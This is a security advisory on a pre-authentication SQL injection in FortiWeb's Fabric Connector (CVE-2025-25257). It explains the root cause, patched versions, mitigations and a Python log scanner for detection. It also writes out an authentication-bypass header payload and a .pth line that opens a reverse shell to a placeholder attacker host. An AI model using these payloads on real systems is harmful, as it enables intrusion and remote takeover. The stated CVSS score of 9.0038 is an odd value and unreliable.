A severe pre-authentication SQL injection vulnerability in Fortinet FortiWeb’s Fabric Connector component allows unauthenticated attackers to achieve remote code execution (RCE) on vulnerable appliances by exploiting improper input handling in a REST API endpoint. Public proof-of-concept (PoC) exploits have been released, significantly increasing the likelihood of exploitation in the wild.
Severity Level: Critical
Vulnerability Details
- CVE ID: CVE-2025-25257
- CWE: CWE-89 – Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')
- CVSS Score: 9.0038
- Vulnerable Component: get_fabric_user_by_token() function in FortiWeb’s Fabric Connector
- Attack Vector: Remote / Unauthenticated
- Vulnerability Type: SQL Injection leading to Remote Code Execution (RCE)
- Exposed Endpoint: /api/fabric/device/status
Root Cause
The vulnerability stems from unsafe usage of user-supplied input in SQL queries, specifically the Authorization: Bearer header. The function get_fabric_user_by_token() constructs SQL statements using snprintf() without input sanitization or parameter binding:
snprintf(s, 0x400u, "select id from fabric_user.user_table where token='%s'", a1);
This enables attackers to inject arbitrary SQL payloads directly into the database query.
Exploitation Of The Vulnerability
Phase 1: SQL Injection via HTTP Header
Attackers send specially crafted HTTP requests to the /api/fabric/device/status endpoint:
- GET /api/fabric/device/status HTTP/1.1
- Authorization: Bearer AAAAAA'or'1'='1
This bypasses authentication.
Phase 2: File Write via MySQL INTO OUTFILE
Using MySQL’s INTO OUTFILE, attackers write a malicious .pth file into Python’s site-packages directory. This file includes:
- import os; os.system('bash -c "/bin/bash -i >& /dev/tcp/attacker_ip/port 0>&1"')
Phase 3: RCE Trigger
The .pth file is executed when Fortinet’s exposed CGI script (/cgi-bin/ml-draw.py) runs, leading to full remote code execution.
Constraints Overcome:
- Character limits in the Authorization header
- SQL parsing limitations via sscanf() (no spaces allowed → workaround via /**/ comments)
- MySQL restrictions on file writing (no overwrite/append → relative path + one-shot payload)
Affected & Fixed Versions
| Version | Affected | Solution |
|---|---|---|
| FortiWeb 7.6 | 7.6.0 through 7.6.3 | Upgrade to 7.6.4 or above |
| FortiWeb 7.4 | 7.4.0 through 7.4.7 | Upgrade to 7.4.8 or above |
| FortiWeb 7.2 | 7.2.0 through 7.2.10 | Upgrade to 7.2.11 or above |
| FortiWeb 7.0 | 7.0.0 through 7.0.10 | Upgrade to 7.0.11 or above |
Recommendations
- Upgrade FortiWeb to the fixed versions.
- Workaround: Disable HTTP/HTTPS administrative interface.
- Alert on HTTP requests to /api/fabric/device/status with suspicious Authorization headers.
- Disable unused Fabric Connector integrations if not essential.
- Remove CGI execution permissions for /cgi-bin/* if not required.
- Audit file permissions of directories such as /migadmin/cgi-bin and Python site-packages.
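The alerting recommendation above, as an added example that is not from this advisory or from Fortinet: a small Python scanner over constructed access-log lines (the log layout is assumed, not FortiWeb's own format) that flags requests to /api/fabric/device/status whose Bearer value shows the injection indicators described in the Root Cause and Constraints sections (a quote closing the token literal, /**/ standing in for spaces, INTO OUTFILE).

```python
import re
from typing import Dict, List, Tuple

# Constructed sample log (assumed layout, not FortiWeb's own format):
#   <src_ip> "<METHOD> <PATH> HTTP/1.1" <status> "Authorization: <value>"
SAMPLE_LOG = """\
198.51.100.7 "GET /api/fabric/device/status HTTP/1.1" 200 "Authorization: Bearer AAAAAA'or'1'='1"
198.51.100.7 "GET /api/fabric/device/status HTTP/1.1" 200 "Authorization: Bearer x'/**/union/**/select/**/1/**/into/**/outfile/**/'x'--"
203.0.113.9 "GET /api/fabric/device/status HTTP/1.1" 401 "Authorization: Bearer 0f3a9c1d2e4b5a6f7081920a3b4c5d6e"
203.0.113.9 "GET /api/v2.0/system/status HTTP/1.1" 200 "Authorization: Bearer 0f3a9c1d2e4b5a6f7081920a3b4c5d6e"
"""

LOG_RE = re.compile(
    r'^(?P<src>\S+) "(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) "Authorization: (?P<auth>[^"]*)"$'
)
TARGET_PATH = "/api/fabric/device/status"

# A genuine token should be an opaque string of token-safe characters (assumption).
SAFE_TOKEN_RE = re.compile(r"[A-Za-z0-9._~+/=-]+")

# Indicators taken from the advisory: a quote closes the token literal in the
# snprintf()-built query, /**/ stands in for the spaces sscanf() would cut off,
# and INTO OUTFILE is the file-write primitive that leads to RCE.
SQLI_PATTERNS: List[Tuple[str, re.Pattern]] = [
    ("quote breaks literal", re.compile(r"'")),
    ("comment as whitespace", re.compile(r"/\*.*?\*/")),
    ("sql keyword", re.compile(r"\b(or|and|union|select)\b", re.I)),
    ("file-write keyword", re.compile(r"\binto\b.{0,8}\boutfile\b", re.I)),
]

def token_indicators(auth_value: str) -> List[str]:
    """Names of injection indicators in an Authorization value; [] if clean or not Bearer."""
    if not auth_value.startswith("Bearer "):
        return []  # the vulnerable lookup only runs on Bearer tokens
    token = auth_value[len("Bearer "):]
    reasons = [] if SAFE_TOKEN_RE.fullmatch(token) else ["non-token characters"]
    reasons += [name for name, pat in SQLI_PATTERNS if pat.search(token)]
    return reasons

def scan_log(text: str) -> List[Dict[str, str]]:
    """Flag requests to the Fabric Connector status endpoint with suspicious tokens."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or m.group("path").split("?", 1)[0] != TARGET_PATH:
            continue
        reasons = token_indicators(m.group("auth"))
        if reasons:  # a 200 here is the alarming case: the injected query succeeded
            hits.append({"src": m.group("src"), "status": m.group("status"),
                         "reasons": ", ".join(reasons)})
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

A 200 response on a flagged request deserves immediate follow-up, since the same query that authenticates the attacker is the one that can write the .pth file.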
Sources:
- https://www.bleepingcomputer.com/news/security/exploits-for-pre-auth-fortinet-fortiweb-rce-flaw-released-patch-now/
- https://fortiguard.fortinet.com/psirt/FG-IR-25-151
- https://labs.watchtowr.com/pre-auth-sql-injection-to-rce-fortinet-fortiweb-fabric-connector-cve-2025-25257/